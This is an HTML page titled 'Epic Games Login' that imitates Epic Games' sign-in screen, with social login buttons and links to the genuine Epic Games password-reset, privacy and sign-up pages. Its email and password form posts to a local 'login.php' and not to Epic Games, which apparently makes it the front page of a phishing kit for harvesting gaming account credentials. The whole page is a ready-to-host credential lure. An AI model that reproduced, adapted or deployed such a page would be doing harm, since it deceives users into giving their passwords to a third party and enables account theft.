<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8" />
    <title>Epic Games Login</title>
    <link rel="stylesheet" href="style.css" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="icon" href="images/logo_dark.png" type="image/png" />
    <link
      href="https://fonts.googleapis.com/css?family=Hind&display=swap"
      rel="stylesheet"
    />
    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"
      charset="utf-8"
    ></script>
  </head>
  <body>
    <div class="login-form">
      <div class="logo"><img src="images/logo.png" alt="" /></div>

      <div class="social-media">
        <button class="fb"><img src="images/fb.png" alt="" /></button>
        <button class="google"><img src="images/google.png" alt="" /></button>
        <button class="ps"><img src="images/ps.png" alt="" /></button>
        <button class="xbox"><img src="images/xbox.png" alt="" /></button>
        <button class="switch"><img src="images/switch.png" alt="" /></button>
      </div>

      <h6>Sign In</h6>
        

	<form action="login.php" method="post" class="form-horizontal"/>
	<div class="col-md-6">
    <div class="textbox">
	 <input type="email" placeholder="Email" name="email" class="form-control" value="" required/>
      <span class="check-message hidden">Required</span>
     </div>
	 </div>
    
	<div class="col-md-6"> 		
  <div class="textbox">
 <input type="password" placeholder="Password" name="password" id="password-field" class="form-control" value="" required/>
  <span class="check-message hidden">Required</span>
  </div>
 </div>
    
	 <br>

        <div class="options">
          <label class="remember-me">
            <span class="checkbox">
              <input type="checkbox" />
              <span class="checked"></span>
            </span>
            Remember me
          </label>
          <a href="https://www.epicgames.com/id/login/forgot-password">Forgot Your Password</a>
        </div>

        <input type="submit" value="Log In Now" class="login-btn" disabled />
        <div class="privacy-link">
          <a href="https://www.epicgames.com/site/en-US/privacypolicy?lang=en-US">Privacy Policy</a>
        </div>
      </form>

      <div class="dont-have-account">
        Don't have an Epic Games account?
        <a href="https://www.epicgames.com/id/register/date-of-birth">Sign Up</a>
      </div>
    </div>

    <script src="main.js" type="text/javascript"></script>
  </body>
</html>